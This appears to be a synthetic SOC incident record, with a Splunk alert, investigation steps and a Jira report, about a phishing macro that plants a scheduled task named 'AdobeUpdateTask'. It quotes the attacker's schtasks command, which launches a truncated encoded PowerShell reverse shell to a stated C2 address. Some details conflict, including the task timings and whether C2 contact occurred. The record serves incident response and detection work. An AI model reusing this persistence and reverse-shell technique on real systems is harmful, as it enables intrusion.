Splunk Alert Details
Alert ID: SPLUNK-SCHEDTASK-1053-7842
Alert Time: 2024-02-14 13:15:33 EST
Severity: HIGH (82/100)
Source: Splunk Enterprise Security
Rule: “Suspicious Scheduled Task Creation”
MITRE ATT&CK: T1053.005 – Scheduled Task
Alert Details:
Correlated Events:
1. Windows Event ID 4698 (Scheduled Task Created):
– Time: 13:10 EST
– Host: HR-WS-023
– User: SYSTEM
– Task Name: “AdobeUpdateTask”
– Task Content:
“`xml
“`
2. Event ID 4688 (Process Creation):
– Time: 13:10:15 EST
– Process: schtasks.exe
– Command: schtasks /create /tn “AdobeUpdateTask” /tr “powershell -WindowStyle Hidden -Enc …” /ru SYSTEM /sc ONLOGON
3. File Creation:
– File: C:\Windows\Tasks\AdobeUpdateTask.job
– Time: 13:10:20 EST
Detection Logic:
– Task name mimics legitimate software (Adobe)
– Runs with SYSTEM privileges
– Encoded PowerShell command typical of reverse shell
– Created by process not typically used for software updates
Additional Context:
– User on HR-WS-023 (kjones) reported clicking email attachment earlier
– No legitimate Adobe software installed on host
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Splunk correlation
Splunk ES
Confirmed malicious scheduled task creation
2. Command Decoding
Decode PowerShell command
PowerShell, CyberChef
Reverse shell to 192.168.34.56:443
3. Immediate Containment
Disable task, isolate host
schtasks, CrowdStrike
Task disabled; host isolated
4. User Interview
Contact user
Teams, Phone
User clicked phishing email with Excel macro
5. Malware Analysis
Analyze macro and payload
CrowdStrike Sandbox
Macro dropped and executed schtasks command
6. Threat Hunting
Search for same task on other hosts
Splunk, CrowdStrike
No other occurrences
Jira Incident Report
Ticket: SOC-2024-072
Summary: T1053 – Malicious Scheduled Task Created for Persistence
Status: RESOLVED
Resolution: MALICIOUS – Persistence Removed
Priority: P2 – MEDIUM
Labels: T1053, scheduled-task, persistence, splunk, phishing
Components: Endpoint-Security, Phishing-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Splunk Enterprise Security correlation.
Alert: “Suspicious Scheduled Task Creation”.
Host: HR-WS-023 (HR Department, user kjones).
Time: 2024-02-14 13:15 EST.
Technique: MITRE ATT&CK T1053.005 – Scheduled Task.
2. Technical Analysis:
Attack Chain:
13:00 – User clicks phishing email with Excel attachment
13:01 – Excel macro executes
13:02 – Macro downloads and runs PowerShell script
13:05 – PowerShell creates scheduled task “AdobeUpdateTask”
13:10 – Task created with SYSTEM privileges
13:15 – Splunk correlation alert triggers
Scheduled Task Details:
Name: AdobeUpdateTask (masquerading as Adobe)
Trigger: User logon (any user)
Run As: SYSTEM (highest privileges)
Action: PowerShell encoded reverse shell to 192.168.34.56:443
Payload Analysis:
Decoded PowerShell command: reverse shell with interactive session
C2 IP: 192.168.34.56 (internal – later identified as compromised engineering host)
Attempts to download additional tools
User Activity:
User received email from “hr@benefits-update[.]net”
Attachment “Benefits_Q1.xlsm”
User enabled macros as instructed
3. Investigation Findings:
Timeline:
13:00 – User clicks email, opens attachment
13:02 – Macro executes PowerShell
13:05 – Scheduled task created
13:15 – Splunk alert triggers
13:17 – SOC investigation begins
13:20 – Host isolated; task disabled
Indicators of Compromise (IoCs):
Task:
– Name: AdobeUpdateTask
– Command: powershell -WindowStyle Hidden -Enc JABjAGwAaQBlAG4AdAA…
Network:
– C2: 192.168.34.56:443
Email:
– Sender: hr@benefits-update[.]net
– Attachment: Benefits_Q1.xlsm (SHA256: b2c3d4e5f6…)
4. Containment Actions:
Immediate Actions:
Disabled scheduled task via schtasks /delete.
Isolated host via CrowdStrike.
Blocked C2 IP at firewall.
Quarantined email from all users.
Host Remediation:
Removed macro-generated files.
No reimage needed (task removed, no persistence left).
User Remediation:
Password reset.
Phishing awareness training assigned.
5. Root Cause Analysis:
Primary Cause: Phishing email with malicious macro.
Contributing Factors:
Macros enabled in Office.
No ASR rule blocking Office child processes.
User lacked recent training.
6. Business Impact:
Operational Impact: HR workstation offline for 2 hours.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
Task removed.
Host cleaned.
User educated.
Email quarantined.
Technical Controls Enhanced:
Enabled ASR rule “Block Office applications from creating child processes”.
Blocked macros from internet via GPO.
Enhanced scheduled task monitoring.
8. Conclusion:
A phishing email led to a malicious scheduled task being created for persistence. Splunk detected the task creation, and the task was removed before any C2 communication occurred.
Closure Rationale: Persistence removed; user educated; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-14 14:30 EST